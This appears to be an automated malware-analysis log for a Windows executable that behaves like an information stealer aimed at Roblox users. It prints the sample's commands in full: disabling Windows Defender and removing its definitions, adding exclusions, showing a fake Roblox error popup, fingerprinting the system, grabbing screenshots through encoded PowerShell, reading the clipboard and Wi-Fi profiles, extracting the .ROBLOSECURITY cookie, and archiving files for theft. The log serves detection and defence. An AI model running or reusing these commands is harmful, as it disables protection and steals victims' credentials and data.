              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: X9g8L63QGs.exeReversingLabs: Detection: 47%
              Source: X9g8L63QGs.exeVirustotal: Detection: 67%
              Source: X9g8L63QGs.exeString found in binary or memory: /ADd$
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile read: C:\Users\user\Desktop\X9g8L63QGs.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\X9g8L63QGs.exe "C:\Users\user\Desktop\X9g8L63QGs.exe"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Users\user\Desktop\X9g8L63QGs.exe "C:\Users\user\Desktop\X9g8L63QGs.exe"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
